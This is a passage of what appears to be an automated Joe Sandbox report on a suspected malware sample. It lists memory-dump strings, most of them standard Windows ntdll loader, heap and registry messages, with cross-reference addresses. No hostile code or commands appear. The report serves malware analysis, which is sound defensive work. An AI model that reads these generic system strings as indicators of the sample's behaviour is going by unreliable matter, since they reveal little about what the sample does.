                                                                                                                                                                                                                                  • Invalid debug info address of this critical section, xrefs: 015152C1
                                                                                                                                                                                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015152ED
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                                                                                  • API String ID: 0-2368682639
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                                                                                                                                  • API String ID: 0-3532704233
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0149D06F
                                                                                                                                                                                                                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0149D202
                                                                                                                                                                                                                                  • @, xrefs: 0149D24F
                                                                                                                                                                                                                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0149D0E6
                                                                                                                                                                                                                                  • @, xrefs: 0149D09D
                                                                                                                                                                                                                                  • @, xrefs: 0149D2B3
                                                                                                                                                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0149D263
                                                                                                                                                                                                                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 0149D136
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                                                                                                                                  • API String ID: 0-1356375266
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                                                                                                                                                                  • API String ID: 0-2224505338
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                  • API String ID: 0-523794902
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                                                                                                  • API String ID: 0-122214566
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                  • API String ID: 0-792281065
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                                                                                                                  • API String ID: 0-1745908468
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • apphelp.dll, xrefs: 01496446
                                                                                                                                                                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 014F977C
                                                                                                                                                                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 014F9790
                                                                                                                                                                                                                                  • LdrpInitShimEngine, xrefs: 014F9783, 014F9796, 014F97BF
                                                                                                                                                                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 014F97B9
                                                                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 014F97A0, 014F97C9
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                  • API String ID: 0-204845295
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • LdrpInitializeProcess, xrefs: 014DC5E4
                                                                                                                                                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01517F8C, 01518000
                                                                                                                                                                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 01517FF0
                                                                                                                                                                                                                                  • Loading import redirection DLL: '%wZ', xrefs: 01517F7B
                                                                                                                                                                                                                                  • LdrpInitializeImportRedirection, xrefs: 01517F82, 01517FF6
                                                                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 014DC5E3
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                  • API String ID: 0-475462383
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01511F82
                                                                                                                                                                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 01511F6A, 01511FA4, 01511FC4
                                                                                                                                                                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01511FA9
                                                                                                                                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01511FC9
                                                                                                                                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01511F8A
                                                                                                                                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 01511F6F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                                                                  • API String ID: 0-861424205
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Kernel-MUI-Language-Disallowed, xrefs: 014C5272
                                                                                                                                                                                                                                  • Kernel-MUI-Language-SKU, xrefs: 014C534B
                                                                                                                                                                                                                                  • Kernel-MUI-Language-Allowed, xrefs: 014C519B
                                                                                                                                                                                                                                  • Kernel-MUI-Number-Allowed, xrefs: 014C5167
                                                                                                                                                                                                                                  • WindowsExcludedProcs, xrefs: 014C514A
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                                                                                  • API String ID: 0-258546922
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                                                                  • API String ID: 0-379654539
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 014D847E
                                                                                                                                                                                                                                  • LdrpInitializeProcess, xrefs: 014D8342
                                                                                                                                                                                                                                  • @, xrefs: 014D84B1
                                                                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 014D8341
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                  • API String ID: 0-1918872054
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01500DEC
                                                                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01500E72
                                                                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01500E2F
                                                                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01500EB5
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                                                                                  • API String ID: 0-1468400865
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                                                                                                                                  • API String ID: 0-2586055223
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • apphelp.dll, xrefs: 014C2382
                                                                                                                                                                                                                                  • LdrpDynamicShimModule, xrefs: 0150A7A5
                                                                                                                                                                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0150A79F
                                                                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0150A7AF
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                  • API String ID: 0-176724104
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                                                                                                  • API String ID: 2994545307-1391187441
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: $ $0
                                                                                                                                                                                                                                  • API String ID: 0-3352262554
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 014A1648
                                                                                                                                                                                                                                  • HEAP: , xrefs: 014A14B6
                                                                                                                                                                                                                                  • HEAP[%wZ]: , xrefs: 014A1632
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                                                                  • API String ID: 0-3178619729
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015100C7
                                                                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 01510128
                                                                                                                                                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015100F1
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                                                                  • API String ID: 0-2474120054
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                                                                                                                                                  • API String ID: 0-1145731471
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                                                                                                                                  • API String ID: 0-2391371766
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                                                                  • API String ID: 0-2779062949
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                                                                                                                                                                  • API String ID: 0-318774311
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                                                                                                                                                                                                  • API String ID: 0-3870751728
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                                                                                                                                                  • API String ID: 0-373624363
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • GlobalizationUserSettings, xrefs: 0157B3B4
                                                                                                                                                                                                                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0157B3AA
                                                                                                                                                                                                                                  • TargetNtPath, xrefs: 0157B3AF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                                                                                                                  • API String ID: 0-505981995
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 014FE455
                                                                                                                                                                                                                                  • HEAP: , xrefs: 014FE442
                                                                                                                                                                                                                                  • HEAP[%wZ]: , xrefs: 014FE435
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                                                                                                  • API String ID: 0-1340214556
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 0150A396
                                                                                                                                                                                                                                  • LdrpCompleteMapModule, xrefs: 0150A39D
                                                                                                                                                                                                                                  • minkernel\ntdll\ldrmap.c, xrefs: 0150A3A7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                                                                                                                  • API String ID: 0-1676968949
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                                                                                                                                  • API String ID: 0-1151232445
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 01511943
                                                                                                                                                                                                                                  • minkernel\ntdll\ldrtls.c, xrefs: 01511954
                                                                                                                                                                                                                                  • LdrpAllocateTls, xrefs: 0151194A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                                                                                                                                  • API String ID: 0-4274184382
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01524508
                                                                                                                                                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01524519
                                                                                                                                                                                                                                  • LdrpCheckRedirection, xrefs: 0152450F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                  • API String ID: 0-3154609507
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • SXS: %s() passed the empty activation context data, xrefs: 01512808
                                                                                                                                                                                                                                  • Actx , xrefs: 014D32CC
                                                                                                                                                                                                                                  • RtlCreateActivationContext, xrefs: 01512803
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                                                                                                                                                  • API String ID: 0-859632880
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • GlobalFlag, xrefs: 0152B30F
                                                                                                                                                                                                                                  • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0152B2B2
                                                                                                                                                                                                                                  • @, xrefs: 0152B2F0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                                                                                                                  • API String ID: 0-4192008846
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • LdrpInitializeTls, xrefs: 01511851
                                                                                                                                                                                                                                  • minkernel\ntdll\ldrtls.c, xrefs: 0151185B
                                                                                                                                                                                                                                  • DLL "%wZ" has TLS information at %p, xrefs: 0151184A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                                                                                                                                  • API String ID: 0-931879808
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • @, xrefs: 014E11C5
                                                                                                                                                                                                                                  • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 014E119B
                                                                                                                                                                                                                                  • BuildLabEx, xrefs: 014E122F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                                                                  • API String ID: 0-3051831665
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @$@
                                                                                                                                                                                                                                  • API String ID: 0-149943524
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @$AddD
                                                                                                                                                                                                                                  • API String ID: 0-2525844869
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID: Legacy$UEFI
                                                                                                                                                                                                                                  • API String ID: 2994545307-634100481
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 0157B5C4
                                                                                                                                                                                                                                  • RedirectedKey, xrefs: 0157B60E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                                                                                                                                                                  • API String ID: 0-1388552009
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • kLsE, xrefs: 014A05FE
                                                                                                                                                                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 014A0586
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                                                                  • API String ID: 0-2547482624
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 014AA21B
                                                                                                                                                                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 014AA229
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                                                                  • API String ID: 0-2876891731
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
